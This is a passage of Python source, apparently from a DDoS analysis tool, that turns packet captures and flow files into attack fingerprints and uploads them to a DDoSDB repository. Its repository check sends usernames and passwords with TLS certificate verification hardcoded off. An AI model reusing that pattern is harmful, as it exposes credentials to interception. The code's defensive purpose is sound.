parser.add_argument("--passwd", nargs='?',help="repository password.")
parser.add_argument("-n", "--noverify", help="disable verification of the host certificate (for self-signed certificates)", action="store_true")
parser.add_argument("-g","--graph", help="build dot file (graphviz). It can be used to plot a visual representation\n of the attack using the tool graphviz. When this option is set, youn will\n received information how to convert the generate file (.dot) to image (.png).", action="store_true")
parser.add_argument ('-f','--filename', required=True, nargs='+')
return parser
#------------------------------------------------------------------------------
def signal_handler(signum, handler):
"""
Signal handler
"""
sys.stdout.flush()
print('\nCtrl+C detected.')
cursor.show()
sys.exit(0)
#------------------------------------------------------------------------------
class CustomConsoleFormatter(logging.Formatter):
"""
Log facility format
"""
def format(self, record):
formater = "%(levelname)s - %(message)s"
if record.levelno == logging.INFO:
GREEN = '\033[32m'
reset = "\x1b[0m"
log_fmt = GREEN + formater + reset
self._style._fmt = log_fmt
return super().format(record)
if record.levelno == logging.DEBUG:
CYAN = '\033[36m'
reset = "\x1b[0m"
log_fmt = CYAN + formater + reset
self._style._fmt = log_fmt
return super().format(record)
if record.levelno == logging.ERROR:
MAGENTA = '\033[35m'
reset = "\x1b[0m"
log_fmt = MAGENTA + formater + reset
self._style._fmt = log_fmt
return super().format(record)
if record.levelno == logging.WARNING:
YELLOW = '\033[33m'
reset = "\x1b[0m"
log_fmt = YELLOW + formater + reset
self._style._fmt = log_fmt
else:
self._style._fmt = formater
return super().format(record)
#------------------------------------------------------------------------------
def logger(args):
"""
Instanciate logging facility. By default, info logs are also
stored in the logfile.
param: cmd line args
"""
logger = logging.getLogger(__name__)
# add custom formater
my_formatter = CustomConsoleFormatter()
# Create handlers
console_handler = logging.StreamHandler()
console_handler.setFormatter(my_formatter)
# enable file logging when verbose/debug is set
if args.debug or args.verbose:
file_handler = logging.FileHandler(args.log)
if (args.debug):
logger.setLevel(logging.DEBUG)
file_handler.setLevel(logging.DEBUG)
elif (args.verbose):
logger.setLevel(logging.INFO)
file_handler.setLevel(logging.INFO)
f_format = logging.Formatter("%(asctime)s - %(levelname)s - %(message)s (%(filename)s:%(lineno)d)")
file_handler.setFormatter(f_format)
logger.addHandler(file_handler)
# add handlers to the logger
logger.addHandler(console_handler)
return logger
#------------------------------------------------------------------------------
def upload(fingerprint, json_file, user, passw, host, key):
"""
Upload a fingerprint and attack vector to DDoSDB
:param fingerprint: Path to the fingerprint file
:param json_file: fingerprint generated file
:param username: DDoSDB username
:param password: DDoSDB password
:return: status_code describing HTTP code received
"""
if not os.path.isfile(json_file):
logger.critical("Could not read the fingerprint json file {}".format(json_file))
files = {
"json": open(json_file, "rb"),
# ignoring pcap file upload for now
"pcap": open(json_file, "rb"),
}
# build headers for repo fingerprint submission
headers = {
"X-Username": user,
"X-Password": passw,
"X-Filename": key
}
try:
urllib3.disable_warnings()
r = requests.post(host+"upload-file", files=files, headers=headers, verify=not args.noverify)
except requests.exceptions.SSLError as e:
logger.critical("SSL Certificate verification of the server {} failed".format(host))
print("If you trust {} re-run with --noverify / -n flag to disable certificate verification".format(host))
logger.debug("Cannot connect to the server to upload fingerprint: {}".format(e))
return None
except requests.exceptions.RequestException as e:
logger.critical("Cannot connect to the server to upload fingerprint")
logger.debug("Cannot connect to the server to upload fingerprint: {}".format(e))
print (e)
return None
if (r.status_code==403):
print ("Invalid credentials or no permission to upload fingerprints:")
elif (r.status_code==201):
print ("Upload success: \n\tHTTP CODE [{}] \n\tFingerprint ID [{}]".format(r.status_code,key))
print ("\tURL: {}query?q={}".format(host,key))
else:
print ("Internal Server Error. Check repository Django logs.")
print ("Error Code: {}".format(r.status_code))
return r.status_code
#------------------------------------------------------------------------------
def get_repository(args,config):
"""
Check credentials and repository based on configuration file or cmd line args
:param args: cmd args
:param config: configuration file
return: user,pass,host: credentials for the repository
"""
user,passw,host = (None,)*3
# look for the repository to upload
if not (args.host):
logger.info("Upload host not defined. Pick the first one in the configuration file.")
config_host = config.sections()[0]
if not (config_host):
logger.critical("Could not find repository configuration. Check configuration file [dddosdb.conf].")
else:
logger.info("Assumming configuration section [{}].".format(config_host))
user = config[config_host]['user']
passw = config[config_host]['passwd']
host = config[config_host]['host']
elif args.host:
host = args.host
if (args.user and args.passwd):
user = args.user
passw = args.passwd
# user/pass not defined by cmd line
else:
# try to find in the configuration file
if args.host in config.sections():
logger.info("Host found in the configuration file")
user = config[args.host]['user']
passw = config[args.host]['passwd']
else:
logger.critical("Credentials not found for [{}].".format(args.host))
else:
logger.critical("Cannot find repository {} credentials. You should define in the cmd line or configuration file [dddosdb.conf].".format(args.host))
return None
return (user,passw,host)
#------------------------------------------------------------------------------
def prepare_tshark_cmd(input_path):
"""
Prepare the tshark command that converts a PCAP to a CSV.
:param input_path: filename
return: tshark command line to be used to convert the file
"""
tshark = shutil.which("tshark")
if not tshark:
logger.error("Tshark software not found. It should be on the path.\n")
return
cmd = [tshark, '-r', input_path, '-T', 'fields']
# fields included in the csv
fields = [
'dns.qry.type', 'ip.dst','ip.flags.mf', 'tcp.flags', 'ip.proto',
'ip.src', '_ws.col.Destination', '_ws.col.Protocol', '_ws.col.Source',
'dns.qry.name', 'eth.type', 'frame.len', '_ws.col.Info', 'udp.length',
'http.request', 'http.response', 'http.user_agent', 'icmp.type',
'ip.frag_offset', 'ip.ttl', 'ntp.priv.reqcode', 'tcp.dstport',
'tcp.srcport', 'udp.dstport', 'udp.srcport', 'frame.time_epoch',
]
for f in fields:
cmd.append('-e')
cmd.append(f)
# field options
options = ['header=y', 'separator=,', 'quote=d', 'occurrence=f' ]
for o in options:
cmd.append('-E')
cmd.append(o)
return cmd
#------------------------------------------------------------------------------
def flow_to_df(ret,filename):
"""
Convert flow file (nfdump) to DataFrame structure.
:param ret: buffer used to return the dataframe itself
:param filename: flow file
return ret: dataframe
"""
nfdump = shutil.which("nfdump")
if not nfdump:
logger.error("NFDUMP software not found. It should be on the path.")
ret.put(NONE)
cmd = [nfdump, '-r', filename, '-o', 'extended', '-o', 'json' ]
try:
cmd_stdout = check_output(cmd, stderr=subprocess.DEVNULL)
except:
ret.put(NONE)
if not cmd_stdout:
ret.put(NONE)
sys.exit()
data = str(cmd_stdout, 'utf-8')
data = StringIO(data)
df = pd.read_json(data).fillna(NONE)
df = df[['t_first', 't_last', 'proto', 'src4_addr', 'dst4_addr',
'src_port', 'dst_port', 'fwd_status', 'tcp_flags',
'src_tos', 'in_packets', 'in_bytes', 'icmp_type',
'icmp_code',
]]
df = df.rename(columns={'dst4_addr': 'ip_dst',
'src4_addr': 'ip_src',
'src_port': 'srcport',
'dst_port': 'dstport',
't_start' : 'frame_time_epoch',
})
df.dstport = df.dstport.astype(float).astype(int)
df.srcport = df.srcport.astype(float).astype(int)
# convert protocol number to name
protocol_names = {num:name[8:] for name,num in vars(socket).items() if name.startswith("IPPROTO")}
df['proto'] = df['proto'].apply(lambda x: protocol_names[x])
# convert protocol/port to service
def convert_protocol_service(row):
try:
highest_protocol = socket.getservbyport(row['dstport'], row['proto'].lower()).upper()
return highest_protocol
except:
return "UNKNOWN"
df['highest_protocol'] = df[['dstport','proto']].apply(convert_protocol_service,axis=1)
# convert to unix epoch (sec)
df['frame_time_epoch'] = pd.to_datetime(df['t_first']).astype(int) / 10**9
df = df.drop(['t_last','t_first','fwd_status'],axis=1)
ret.put(df)
#------------------------------------------------------------------------------
def pcap_to_df(ret,filename):
"""
Convert pcap file to DataFrame structure.
:param ret: buffer used to return the dataframe itself
:param filename: flow file
return ret: dataframe
"""
cmd = prepare_tshark_cmd(filename)
if not cmd:
ret.put(NONE)
sys.exit()
try:
cmd_stdout = check_output(cmd, stderr=subprocess.DEVNULL)
except:
ret.put(NONE)
sys.exit()
if not cmd_stdout:
ret.put(NONE)
sys.exit()
data = str(cmd_stdout, 'utf-8')
data = StringIO(data)
df = pd.read_csv(data,low_memory=False,error_bad_lines=False)
# src/dst port
if (set(['tcp.srcport','udp.srcport','tcp.dstport','udp.dstport']).issubset(df.columns)):
# Combine source and destination ports from tcp and udp
df['srcport'] = df['tcp.srcport'].fillna(df['udp.srcport'])
df['dstport'] = df['tcp.dstport'].fillna(df['udp.dstport'])
df['dstport'] = df['dstport'].fillna(NONE).astype(float).astype(int)
df['srcport'] = df['srcport'].fillna(NONE).astype(float).astype(int)
if (set(['ip.src','ip.dst','_ws.col.Source','_ws.col.Destination']).issubset(df.columns)):
# Combine source and destination IP - works for IPv6
df['ip.src'] = df['ip.src'].fillna(df['_ws.col.Source'])
df['ip.dst'] = df['ip.dst'].fillna(df['_ws.col.Destination'])
# rename protocol field
df = df.rename({'_ws.col.Protocol': 'highest_protocol'},axis=1)
# protocol number to name
protocol_names = {num:name[8:] for name,num in vars(socket).items() if name.startswith("IPPROTO")}
df['ip.proto'] = df['ip.proto'].fillna(NONE).astype(float).astype(int)
df['ip.proto'] = df['ip.proto'].apply(lambda x: protocol_names[x] if (x>0) else -1)
df['ip.ttl'] = df['ip.ttl'].fillna(NONE).astype(float).astype(int)
df['udp.length'] = df['udp.length'].fillna(NONE).astype(float).astype(int)
df['ntp.priv.reqcode'] = df['ntp.priv.reqcode'].fillna(NONE).astype(float).astype(int)
# timestamp
df['start_timestamp'] = df['frame.time_epoch'].iloc[0]
# Remove columns: 'tcp.srcport', 'udp.srcport','tcp.dstport', 'udp.dstport', _ws.col.Source, _ws.col.Destination
df.drop(['tcp.srcport', 'udp.srcport', 'tcp.dstport', 'udp.dstport','_ws.col.Source', '_ws.col.Destination'], axis=1, inplace=True)
# Drop all empty columns (for making the analysis more efficient! less memory.)
df.dropna(axis=1, how='all', inplace=True)
df = df.fillna(NONE)
if 'icmp.type' in df.columns:
df['icmp.type'] = df['icmp.type'].astype(int)
if 'dns.qry.type' in df.columns:
df['dns.qry.type'] = df['dns.qry.type'].astype(int)
if 'ip.frag_offset' in df.columns:
df['ip.frag_offset'] = df['ip.frag_offset'].astype(str)
if 'ip.flags.mf' in df.columns:
df['ip.flags.mf'] = df['ip.flags.mf'].astype(str)
if ('ip.flags.mf' in df.columns) and ('ip.frag_offset' in df.columns):
# Analyse fragmented packets
df['fragmentation'] = (df['ip.flags.mf'] == '1') | (df['ip.frag_offset'] != '0')
df.drop(['ip.flags.mf', 'ip.frag_offset'], axis=1, inplace=True)
# translate flags to string
# if 'tcp.flags.str' in df.columns:
# df['tcp.flags.str'] = df['tcp.flags.str'].str.encode("utf-8")
df.columns = [c.replace('.', '_') for c in df.columns]
# remove info field
del df['_ws_col_Info']
ret.put(df)
#------------------------------------------------------------------------------
## Function for calculating the TOP 'N' and aggregate the 'others'
## Create a dataframe with the top N values and create an 'others' category
def top_n_dataframe(dataframe_field,df,n_type,top_n=20):
"""
Find top n values in one dataframe
:param dataframe_field: field to be evaluated
:param df: full dataframe
:param n_type: network file type (pcap or flow)
:param top_n: build dataframe with the top_n results
return df: dataframe itself
"""
field_name = dataframe_field.name
if (field_name == "frame_time_epoch" or field_name=="start_timestamp"):
return pd.DataFrame()
# flow - different heuristic
if (n_type==FLOW_TYPE):
if (field_name == "in_packets"):
return pd.DataFrame()
data = df.groupby(field_name)["in_packets"].sum().sort_values(ascending=False)
top = data[:top_n].reset_index()
top.columns = [field_name,'count']
new_row = pd.DataFrame(data = {
'count' : [ data[top_n:].reset_index().iloc[:,1].sum()],
field_name : ['others'],
})
# pcap
else:
top = df[field_name].value_counts().reset_index()[:top_n]
new_row = pd.DataFrame(data = {
'count' : [df[field_name].value_counts().reset_index()[top_n:][field_name].sum()],
field_name : ['others'],
})
# combine the result dataframe (top_n + aggregated 'others')
top.columns = [field_name, 'count']
top_result = pd.concat([top, new_row],sort=False)
# percentage field
df = top_result.groupby(field_name).sum()
df=df.sort_values(by="count", ascending=False)
df['percent'] = df.transform(lambda x: (x/np.sum(x)*100).round()).astype(int)
if (len(df)< 16):
# z-score useless when few elements
df['zscore'] = NONE
else:
# z-score of 2 indicates that an observation is two standard deviations above the average
# a z-score of zero represents a value that equals the mean.
df['zscore'] = ((df['count'] - df['count'].mean())/df['count'].std(ddof=0)).round().fillna(NONE)
return (df.reset_index())
#------------------------------------------------------------------------------
def infer_target_ip (df,n_type):
"""
df: dataframe from pcap
n_type: network file type (flows,pcap)
return: list of target IPs
"""
# Check the dst_ip frequency distribution.
# When the second most often dst_ip is grouped in the category "others" (remains)
# this means that we have a high entropy in the set.
# A lot of requests targeting multiples dst_ip
# ip_dst count percent zscore
# 94.198.154.130 2799 50 4.0
# others 1842 33 2.0 <-- not an outlier
# 94.198.154.24 86 2 -0.0
data = top_n_dataframe(df.ip_dst,df,n_type)
data = data[(data.iloc[1,0] == "others") & (data['zscore'] <3)].size
if not data:
logger.info("There are several destination IP in the dataset. High entropy. Effectiveness will be low.")
# find outlier
outlier = find_outlier(df['ip_dst'],df,n_type)
if (not outlier or len(outlier)<1):
logger.debug("We cannot find the DDoS target IP address. Not enought info to find the outlier.")
logger.debug("Trying to aggregate top IPs")
data = top_n_dataframe(df['ip_dst'],df,n_type)
# Outlier was not found (i.e the processed attack targeting multiples IP address)
# Check for Carpet Bombing attack (which target multiple IP addresses in the same subnet)
#
# Try to cluster the victim IPs. Usually, there are (IPs) part of the same network block.
# Select IPs responsible for more than 20% of the traffic and try to cluster them.
# If we succeed IPs are in the same range (network mask bigger than 21) we combine than and set as target.
data_ = data[(data['percent']> CARPET_BOMBING_SIMILARITY_THRESHOLD)]['ip_dst'].tolist()
ip_lst = sorted(data[(data['percent']> CARPET_BOMBING_SUBNET)]['ip_dst'].tolist())
# filter ipv4|ipv6 only
ips = []
for ip in ip_lst:
try:
ipaddr.IPAddress(ip)
except:
continue
ips.append(ip)
# only one IP address has return
if (len(ips)<2):
return (ips,df)
lowest_ip = ips[0]
highest_ip = ips[-1]
# aggregation mask size
mask_length = ipaddr._get_prefix_length(int(lowest_ip), int(highest_ip), lowest_ip.max_prefixlen)
if (mask_length > 21):
logger.debug("Top IPs are correlated")
# rewrite to one IP address
for ip in ip_lst[:1]:
df.loc[df['ip_dst'] == ip,"ip_dst"] = ip_lst[0]
return ( (ip_lst[0]).split(), df)
else:
# return the top 1
return (list(df['ip_dst'].value_counts().keys()[0]),df)
else:
return (outlier,df)
#------------------------------------------------------------------------------
def animated_loading(msg="loading ", count=-1):
"""
print loading animation
:param msg: prefix label
"""
chars = " ▁▂▃▄▅▆▇▇▇▆▅▄▃▂▁ "
if (count == -1):
cursor.hide()
for char in chars:
#sys.stdout.write('\r'+msg+''+char)
sys.stdout.write('\r'+'['+char+'] '+msg)
time.sleep(.05)
sys.stdout.flush()
cursor.show()
else:
char = chars[ int(count/2) % len(chars)]
sys.stdout.write('\r' + '[' + char + '] ' + msg)
time.sleep(.05)
sys.stdout.flush()
#------------------------------------------------------------------------------
def find_outlier(df_filtered,df,n_type,strict=0):
"""
Find outlier based in zscore
:param df_filtered: dataframe filtered by target_ip
:param df: full dataframe used for flows analysis
:param n_type: network file type (flows,pcap)
:param strict: turn the outlier process less flexible (ignore zscore, use frequency)
"""
field_name = df_filtered.name
# summarization dataframe
data = top_n_dataframe(df_filtered,df,n_type)
if (data.empty):
return
outlier_field = data.columns[0]
# be more strict in the filter
if (strict):
data_ = data[(data['percent']> SIMILARITY_THRESHOLD) & (data['zscore']>2)]
# if the filter does not return anything, check if the df is
# composed by only one field
if (data_.size==0):
# get first line from the summarized dataframe
data = data.head(1)
# ignore zscore, use frequency threshold
data = data[(data['percent']> SIMILARITY_THRESHOLD) & (data['zscore']<0) & (data[outlier_field]!="others")]
if (data.empty): return
outliers = data.iloc[:,0].tolist()
logger.debug("Outliers for .:{}:. --> {} \n {}" .format(outlier_field, outliers, data.head(5).to_string(index=False) ))
logger.debug('-' * 60)
return (outliers)
else:
# return the filtered dataframe saved in aux var
data = data_
# regular process - no strict
else:
data = data[(data['percent']> SIMILARITY_THRESHOLD) | (data['zscore']>2)]
if (len(data)==0): return None
outliers = data.iloc[:,0].tolist()
if (outliers == NONE):
logger.debug("Outliers for .:{}:. --> None \n {}" .format(data.columns[0], data.head(5).to_string(index=False) ))
return
# remove outlier when dispersion is equal to `others` values, for example:
# srcport count percent zscore
# 443 2157 39 3.0
# others 2135 38 3.0
zscore_others = data.loc[data[outlier_field] == "others", 'zscore'].tolist()
if (zscore_others):
# remove all fields with the same values than `others`
outliers = data[data.zscore!=zscore_others[0]].iloc[:,0].tolist()
logger.debug('-' * 60)
if (len(outliers)>0):
logger.debug("Outliers for .:{}:. --> {} \n {}" .format(data.columns[0], outliers, data.head(5).to_string(index=False) ))
return outliers
else:
logger.debug("Outliers for .:{}:. --> None \n {}" .format(data.columns[0], data.head(5).to_string(index=False) ))
return None
#------------------------------------------------------------------------------
# Infer the attack based on filtered dataframe
def infer_protocol_attack(df,n_type):
"""
Evaluate protocol distribution and return the used in the attack
:param df: dataframe
:param n_type: network file type (flows,pcap)
return: the list of top protocols and if the framentation protocol has found
"""
target_ip = df['ip_dst'].iloc[0]
logger.info("A total of {} IPs have attacked the victim {}".format(df.ip_src.nunique(), target_ip))
# find protocol outliers
outlier = find_outlier(df['highest_protocol'],df,n_type)
# there is no outlier
if not outlier:
# top protocol in the distribution
top1_protocol = df["highest_protocol"].value_counts().keys()[0]
# IPv4 and IPv6 as highest_protocol denotes a fragmentation attack
if bool(re.search('IPv[46]',top1_protocol)):
frag = True
data = top_n_dataframe(df['highest_protocol'],df,n_type)
# fragmentation attack is bigger than 50% of the provided traffic (empirical value)
if (data['percent'].iloc[0] > 50):
logger.debug("Frag Attack: a large fraction of traffic {}% is related to fragmentation attack".format(data['percent'].iloc[0]))
# remove fragmentation protocol from the dataframe
data = top_n_dataframe(df['highest_protocol'],df[df['highest_protocol'] != "IPv4"],n_type)
# find outlier again by ignoring fragmentation protocol (just removed)
outlier = find_outlier(data['highest_protocol'],data,n_type)
if not outlier:
# still no outlier. It seems that we have an even protocol distribution
# this may be caused by multi-vector attack
# If remains protocols have a simmilar distribution (+-30%) use them as outliers - empirical
data = data[(data['percent']>30) & (data['highest_protocol']!="others")]
protocol_list = data.sort_values(by="percent",ascending=False)['highest_protocol'].tolist()
#protocol_list = data[data['percent']>30].sort_values(by="percent",ascending=False)['highest_protocol'].tolist()
return (protocol_list,frag)
else:
# did not get outliers and it is not fragmentation attack
# multiprotocol attack with no fragmentation
frag = False
data = top_n_dataframe(df['highest_protocol'],df,n_type)
# If remains protocols have a simmilar distribution (+-30%) use them as outliers - empirical
data = data[(data['percent']>30) & (data['highest_protocol']!="others")]
protocol_list = data.sort_values(by="percent",ascending=False)['highest_protocol'].tolist()
return (protocol_list,frag)
else:
# outlier found
logger.debug("Protocol outlier found: {}".format(outlier))
# return the top1
logger.debug("Top1 protocol could be classified as outlier")
top1_protocol = df["highest_protocol"].value_counts().reset_index().head(1)['index'].tolist()
frag = False
return (top1_protocol,frag)
return None
#------------------------------------------------------------------------------
def determine_file_type(input_file):
"""
Determine what sort of file the input is.
:param input_file: The path to the file, e.g. /home/user/example.pcap
:return: The file type of the input file as a string
:raises UnsupportedFileTypeError: If input file is not recognised or not supported
"""
file_ = shutil.which("file")
if not file_:
logger.error("File software not found. It should be on the path.\n")
return (NONE)
file_info, error = subprocess.Popen([file_, input_file], stdout=subprocess.PIPE).communicate()
file_type = file_info.decode("utf-8").split()[1]
if file_type == "tcpdump":
return "pcap"
if file_type == "pcap":
return "pcap"
elif file_type == "pcap-ng" or file_type == "pcapng":
return "pcapng"
elif file_type == "data" and (b"nfdump" in file_info or b"nfcapd" in file_info):
return "nfdump"
else:
logger.critical("The file [{}] type [{}] is not supported.".format(input_file,file_type))
sys.exit(0)
#------------------------------------------------------------------------------
def load_file(args,filename):
"""
Wrapper to call attack file to dataframe
:param args: command line parameters
:return n_type: network file type (flows,pcap)
:return df: dataframe itself
"""
file_type = determine_file_type(filename)
if (file_type == NONE):
return (NONE,NONE)
if re.search(r'nfdump', file_type):
load_function = flow_to_df
n_type = FLOW_TYPE
elif re.search(r'pcap', file_type):
load_function = pcap_to_df
n_type = PCAP_TYPE
# load dataframe using threading
ret = queue.Queue()
the_process = threading.Thread(name='process', target=load_function, args=(ret,filename))
the_process.start()
msg = "Loading network file: `{}' ".format(filename)
try:
count = 0
cursor.hide()
while the_process.is_alive():
if the_process:
animated_loading(msg, count=count) if not args.quiet else 0
count += 1
cursor.show()
the_process.join()
except (KeyboardInterrupt, SystemExit):
cursor.show()
signal_handler(None,None)
df = ret.get()
# not a dataframe
if not isinstance(df, pd.DataFrame):
print ("\n")
return(NONE,NONE)
sys.stdout.write('\r'+'['+'\u2713'+'] '+ msg+'\n')
return (n_type,df)
#------------------------------------------------------------------------------
def multi_attack_vector_heuristic(df_filtered,n_type):
"""
Generic heuristic to deal with low accuracy ratio fingerprint
:param df: dataframe filtered by target_ip
:param n_type: network file type (flows,pcap)
:return fingerprint: json file
"""
logger.debug("ATTACK TYPE 3: NON MULTIFRAG FRAGMENTATION ATTACK")
fields = df_filtered.columns.tolist()
if "eth_type" in fields: fields.remove("eth_type")
fingerprint = {}
for field in fields:
outlier = find_outlier(df_filtered[field],df_filtered,n_type,True)
if (outlier):
if (outlier != [NONE]):
fingerprint.update( {field : outlier} )
return (fingerprint)
#------------------------------------------------------------------------------
def multifragmentation_heuristic(df_filtered,n_type):
"""
Determine if multiples protocol were used for fragmentation attack
:param df: dataframe filtered by target_ip
:param n_type: network file type (flows,pcap)
:return fingerprint: json file
"""
# flow does not have fragmentation info
if (n_type == FLOW_TYPE):
return (None)
fingerprint = {}
df_ = df.fragmentation.value_counts(normalize=True).mul(100).reset_index()
value = df_.loc[:,"fragmentation"].values[0]
df_['index']=df_['index'].astype(bool)
# percentage of packets with fragmentation
try:
frag_percentage = df_[(df_['fragmentation']>SIMILARITY_THRESHOLD) & (df_['index'].values)[0]==True].values[0][1]
except (ValueError,IndexError):
return None
# high chances to have multi protocol frag attack
if (frag_percentage > SIMILARITY_THRESHOLD):
logger.debug("ATTACK TYPE 2: MULTIPROTOCOL FRAGMENTATION ATTACK")
# find protocols responsible for that fragmentation
df_ = df.groupby(['highest_protocol','fragmentation'])['fragmentation'].count().to_frame().\
rename(columns={'fragmentation':'count'}).reset_index()
# may have more than one protocol responsible for that fragmementaiton percentage per group
# then, find the percentage of frag per protocol
df_['percent_frag'] = df_.groupby(['highest_protocol'])['count'].transform(lambda x: (x/x.sum()).mul(100))
df_['percent'] = (df_['count'] / df_['count'].sum()) * 100
df_['fragmentation']=df_['fragmentation'].astype(bool)
# protocol with high percentage of frag
protocols = df_[(df_.fragmentation == True) & (df_.percent>SIMILARITY_THRESHOLD) & \
(df_.percent_frag>SIMILARITY_THRESHOLD) ]['highest_protocol'].tolist()
if not protocols:
return
# find respective src_port
logger.info("Reprocessing attack based on protocols: {}".format(protocols))
df_filtered = df_filtered[df_filtered.highest_protocol.isin(protocols)]
srcports_frag = df[df.highest_protocol.isin(protocols)]['srcport'].unique().tolist()
outlier = find_outlier(df[df.highest_protocol.isin(protocols)]['srcport'],df_filtered,n_type)
# remove port "NONE" (assigned to IPv4 frag protocol)
if (NONE in srcports_frag) or (not outlier):
#srcports_frag.remove(NONE)
srcports_frag = [NONE]
else:
# add srcport to the fingerprint
fingerprint.update( { "srcport" : srcports_frag } )
fields = df_filtered.columns.tolist()
if "eth_type" in fields: fields.remove("eth_type")
for field in fields:
outlier = find_outlier(df_filtered[field],df,n_type)
if (outlier):
if (outlier != [NONE]):
fingerprint.update( {field : outlier} )
# revome fields the may overlap srcports outliers
if 'ip_proto' in fingerprint:
del fingerprint['ip_proto']
if 'ip_ttl' in fingerprint:
del fingerprint['ip_ttl']
return (fingerprint)
#------------------------------------------------------------------------------
def generate_dot_file(df_fingerprint, df):
"""
Build .dot file that is used to generate a png file showing the
fingerprint match visualization
:param df_fingerprint: dataframe filtered based on matched fingerprint
:param df: dataframe itself
"""
# sum up dataframe to plot
df_fingerprint = df_fingerprint[['ip_src','ip_dst']].drop_duplicates(keep="first")
df_fingerprint['match'] = 1
df_remain = df[['ip_src','ip_dst']].drop_duplicates(keep="first")
df_remain['match'] = 0
df_plot = pd.concat([df_fingerprint,df_remain], ignore_index=True)
# anonymize plot data
df_plot.reset_index(inplace=True)
df_plot.drop('ip_src',axis=1,inplace=True)
df_plot = df_plot.rename(columns={"index": "ip_src"})
df_plot['ip_dst'] = "victim"
logger.debug("Distribution of filtered traffic: \n{}".format(df_plot.match.value_counts(normalize=True).mul(100)))
filename, file_extension = os.path.splitext(args.filename)
with open(filename+".dot", 'w+', encoding = 'utf-8') as f:
f.write("graph {\n")
for index, row in df_plot.iterrows():
if (row['match'] == 0 ):
f.write("\t {} -- {}[color=green,penwidth=1.0];\n".format(row["ip_src"], row["ip_dst"]))
else:
f.write("\t {} -- {}[color=red,penwidth=2.0];\n".format(row["ip_src"], row["ip_dst"]))
f.write("}\n")
print ("Use the following command to generate an image:")
print ("\t sfdp -x -Goverlap=scale -Tpng {}.dot > {}.png".format(filename,filename))
# print ("\t convert {}.png -gravity North -background YellowGreen -splice 0x18 -annotate +0+2 'Dissector' {}.gif ".format(filename,filename))
#------------------------------------------------------------------------------
def printProgressBar(value,label,fill_chars="■-"):
"""
Print progress bar
:param value: value to be printed
:param label: label used as title
:param fill_chars: char used in the animation
"""
if (args.quiet): return True
n_bar = 40 #size of progress bar
max = 100
j= value/max
sys.stdout.write('\r')
bar = fill_chars[0] * int(n_bar * j)
bar = bar + fill_chars[1] * int(n_bar * (1-j))
sys.stdout.write(f"{label.ljust(16)} | [{bar:{n_bar}s}] {int(100 * j)}% ")
sys.stdout.flush()
print ("")
return True
#------------------------------------------------------------------------------
def evaluate_fingerprint(df,df_fingerprint,fingerprints):
"""
:param df: datafram itself
:param df_fingerprint: dataframe filtered based on matched fingerprint
:param fingerprint: json file
:return accuracy_ratio: the percentage that generated fingerprint can match in the full dataframe
"""
total_rows_matched = len(df_fingerprint)
msg = "Fingerprint evaluation"
sys.stdout.write('\r'+'['+'\u2713'+'] '+ msg+'\n')
logger.info("TRAFFIC MATCHED: {0}%. The generated fingerprint will filter {0}% of the analysed traffic".format(round(len(df_fingerprint)*100/len(df))))
percentage_of_ips_matched = len(df_fingerprint['ip_src'].unique().tolist() )*100/len(df.ip_src.unique().tolist())
logger.info("IPS MATCHED : {0}%. The generated fingerprint will filter {0}% of SRC_IPs".format(round(percentage_of_ips_matched)))
if not (args.quiet):
value = round(len(df_fingerprint)*100/len(df))
printProgressBar(value,"TRAFFIC MATCHED")
printProgressBar(round(percentage_of_ips_matched),"IPs MATCHED")
#
# Fields breakdown
#
if (args.verbose) or (args.debug):
count = 0
try:
df.fragmentation = df.fragmentation.astype(str)
except:
next
# for each fingerprint generated
for fingerprint in (fingerprints['attack_vector']):
count = count + 1
results = {}
for key, value in fingerprint.items():
if key in ["src_ips","attack_vector_key","one_line_fingerprint"]:
continue
val = ','.join(str(v) for v in value)
val = val.split()
total_rows_matched = len(df[df[key].isin(val)])
percentage = round(total_rows_matched*100/len(df))
# dict with all the fields and results
results.update( {key: percentage} )
results_sorted = {k: v for k, v in sorted(results.items(), key=lambda item: item[1], reverse=True)}
logger.info(" ============= FIELDS BREAKDOWN === ATTACK_VECTOR {} ============= ".format(count))
for label, percentage in results_sorted.items():
printProgressBar(percentage,label,"▭ ")
return ()
#------------------------------------------------------------------------------
def check_repository(config):
"""
Check repository access and credentials
:param config: configuration file path
"""
logger.info("Checking repository")
url = "https://raw.githubusercontent.com/ddos-clearing-house/ddos_dissector/2.0/repository.txt"
response = requests.get(url)
servers = response.content.decode("utf-8").split()
login = ""
table_column = 3
row_format ="{:>22}" * (table_column)
print(row_format.format("\nServer", "Status", "Credentials"))
print ("--"*25)
for server in servers:
try:
code = requests.get(server, timeout=2).status_code
except:
code = "OFFLINE"
if (code ==200):
code = "ONLINE"
# check credentials
headers = {
"X-Username": config['repository']['user'],
"X-Password": config['repository']['passwd'],
}
server_config = re.search('https?://(.*)/?', server).group(1)
# check if the configuration file has credentials for the online server
if (server_config in config.sections()):
if (config[server_config]):
headers = {
"X-Username": config[server_config]['user'],
"X-Password": config[server_config]['passwd'],
}
else:
logger.info("Credentials from {} is not available in the configuration file [ddosdb.conf]")
login = "NOT_OK"
try:
r = requests.get(server+"/my-permissions", headers=headers,verify=False)
except requests.exceptions.RequestException as e:
logger.critical("Cannot connect to the server to check credentials")
logger.debug("{}".format(e))
print (e)
if (r.status_code==403):
print ("Invalid credentials or no permission to upload fingerprints:")
login = "NOT_OK"
elif (r.status_code==200):
login = "SUCCESS"
row_format ="{:>15}" * (table_column)
print(row_format.format(server, code, login))
sys.exit(0)
#------------------------------------------------------------------------------
def get_matching_ratio(df_attack_vector,fingerprint):
"""
Get matching ratio for each fingerprint found
:param df_attack_vector dataframe related to the fingerprint
:param fingerprint dictionary with matched fields
:return dic with ration and fingerprint
"""
if not fingerprint:
return (NONE,NONE)
df_fingerprint = df_attack_vector
for key, value in fingerprint.items():
# ignore metadata field
if key not in df_fingerprint.columns:
continue
df_fingerprint = df_fingerprint[df_fingerprint[key].isin(value)]
# evaluate fingerprint matching ratio
accuracy_ratio = round(len(df_fingerprint)*100/len(df_attack_vector))
d = { "ratio" : accuracy_ratio,
"fingerprint" : fingerprint
}
return (df_fingerprint,d)
#------------------------------------------------------------------------------
def single_vector_heuristic(df_attack_vector,n_type):
fields = df_attack_vector.columns.tolist()
if "eth_type" in fields: fields.remove("eth_type")
logger.debug("ATTACK TYPE 1: GENERIC ")
fingerprint = {}
for field in fields:
outlier = find_outlier(df_attack_vector[field],df_attack_vector,n_type)
if (outlier):
if (outlier != [NONE]):
fingerprint.update( {field : outlier} )
return (fingerprint)
#------------------------------------------------------------------------------
def build_attack_fingerprint(df,df_attack_vector,n_type,multi_vector_attack_flag):
"""
Inspect generic protocol
:param df: datafram itself
:param n_type: network file type (flows,pcap)
